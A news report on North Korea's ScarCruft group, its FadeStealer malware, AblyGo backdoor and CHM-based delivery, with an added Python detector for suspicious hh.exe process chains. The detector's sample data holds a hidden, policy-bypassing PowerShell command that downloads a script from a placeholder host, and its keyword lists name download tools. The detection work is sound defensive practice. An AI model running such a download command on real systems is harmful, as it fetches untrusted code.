FadeStealer Employed by ScarCruft APT

The North Korean threat group ScarCruft has recently been observed using a previously undisclosed information-stealing malware that includes wiretapping capabilities. Additionally, they have developed a backdoor written in Golang that abuses the Ably real-time messaging service for command-and-control.

A technical report from the AhnLab Security Emergency Response Center (ASEC) stated that the threat actor employed the Ably service to transmit their commands through the Golang backdoor. The necessary API key for command communication was discovered to be stored in a GitHub repository.

ScarCruft, believed to be affiliated with North Korea's Ministry of State Security (MSS) and operating as a state-sponsored entity, has been active since at least 2012.

Their attack methodology typically involves spear-phishing campaigns to deliver the RokRAT malware, although they have also utilized various customized tools to gather sensitive information.

Malware Delivered in Microsoft Help File

In the most recent incident detected by ASEC, the malicious email contained a Microsoft Compiled HTML Help (.CHM) file. This technique, initially reported in March 2023, triggers contact with a remote server upon clicking, leading to the download of a PowerShell malware called Chinotto.

Chinotto, in addition to establishing persistence and retrieving additional payloads, introduces a backdoor known as AblyGo (also referred to as SidLevel by Kaspersky), which abuses the Ably API service for command-and-control purposes.

Furthermore, AblyGo serves as a conduit for executing FadeStealer, an information-stealing malware equipped with features such as capturing screenshots, collecting data from removable media and smartphones, logging keystrokes, and recording audio from microphones.

ASEC stated that the RedEyes group, to which ScarCruft belongs, specifically targets individuals such as North Korean defectors, human rights activists, and university professors, with the primary aim of stealing valuable information.

Unauthorized eavesdropping on individuals within South Korea is considered a violation of privacy and is strictly regulated under relevant laws. Nevertheless, the threat actors managed to monitor victims' activities on their computers and even conducted wiretapping.

CHM files have been observed being used by other North Korea-affiliated groups, including Kimsuky. SentinelOne recently disclosed a campaign in which the file format was employed to deliver a reconnaissance tool named RandomQuery.

In the latest set of attacks identified by ASEC, the CHM files are configured to drop a BAT file, which is subsequently used to download further-stage malware and exfiltrate user information from compromised hosts.
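The delivery chain described above (a CHM file opened by the Windows HTML Help viewer, hh.exe, that drops a BAT file, which in turn launches a PowerShell downloader) is visible as a parent-child process relationship. The following is an added detection example written for this page, not code from the article or from ASEC: it runs over a handful of constructed, Sysmon-style process-creation records and flags any hh.exe process whose descendants include a scripting interpreter, noting whether a .bat file was run and whether a download-style command line appears in the chain. The event format, process IDs, file names and the URL are all made up for the example.

```python
import ntpath
from collections import defaultdict

# Constructed sample process-creation events (simplified Sysmon Event ID 1 shape).
# These records are invented for this example; they are not telemetry from the ASEC report.
SAMPLE_EVENTS = [
    {"pid": 100,  "ppid": 1,    "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Legitimate help-file viewing: hh.exe with no child processes.
    {"pid": 1500, "ppid": 100,  "image": r"C:\Windows\hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Program Files\Tool\manual.chm'},
    # Suspicious chain: CHM -> cmd.exe running a dropped BAT -> PowerShell downloader.
    {"pid": 2001, "ppid": 100,  "image": r"C:\Windows\hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Users\user\Downloads\invitation.chm'},
    {"pid": 2002, "ppid": 2001, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c C:\Users\user\AppData\Local\Temp\stage.bat'},
    {"pid": 2003, "ppid": 2002,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c '
                '"iwr http://c2.example.invalid/x -OutFile $env:TEMP\\x.ps1"'},
]

# Interpreters that a help viewer has no legitimate reason to spawn.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "rundll32.exe", "certutil.exe"}

# Command-line tokens that suggest a download stage somewhere in the chain.
DOWNLOAD_HINTS = ("iwr", "invoke-webrequest", "downloadstring", "downloadfile",
                  "certutil", "curl", "bitsadmin", "http://", "https://")


def _basename(path):
    """Lower-cased file name of a Windows path, so comparisons are case-insensitive."""
    return ntpath.basename(path).lower()


def _descendants(children, pid):
    """Depth-first walk over every descendant pid of `pid`."""
    stack = list(children.get(pid, []))
    while stack:
        p = stack.pop()
        yield p
        stack.extend(children.get(p, []))


def find_chm_chains(events):
    """Return one alert per hh.exe process that spawned a scripting interpreter.

    Each alert lists the descendant image names, whether a .bat file was run,
    and whether any descendant command line looks like a downloader.
    """
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])

    alerts = []
    for e in events:
        if _basename(e["image"]) != "hh.exe":
            continue
        chain = [by_pid[p] for p in _descendants(children, e["pid"]) if p in by_pid]
        images = [_basename(c["image"]) for c in chain]
        if not SUSPICIOUS_CHILDREN.intersection(images):
            continue  # hh.exe that only rendered a help file: no alert
        cmdlines = " ".join(c["cmdline"].lower() for c in chain)
        alerts.append({
            "chm_pid": e["pid"],
            "chm_cmdline": e["cmdline"],
            "chain": images,
            "bat_dropped": ".bat" in cmdlines,
            "downloader": any(h in cmdlines for h in DOWNLOAD_HINTS),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_chm_chains(SAMPLE_EVENTS):
        print(alert)
```

The benign hh.exe record (pid 1500) produces no alert because it has no descendants; only the chain rooted at pid 2001 is reported, with the BAT and downloader flags both set. In production the same logic maps onto a SIEM query joining ParentImage and Image on process-creation events.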

Spear-phishing, which has been the preferred initial access technique of Kimsuky for over a decade, typically involves extensive research and meticulous preparation, as highlighted in advisories from US and South Korean intelligence agencies.

These findings come in the wake of the Lazarus Group's exploitation of security vulnerabilities in widely-used South Korean software, including INISAFE CrossWeb EX, MagicLine4NX, TCO!Stream, and VestCert, as part of their active campaign to infiltrate companies and deploy malware.

June 22, 2023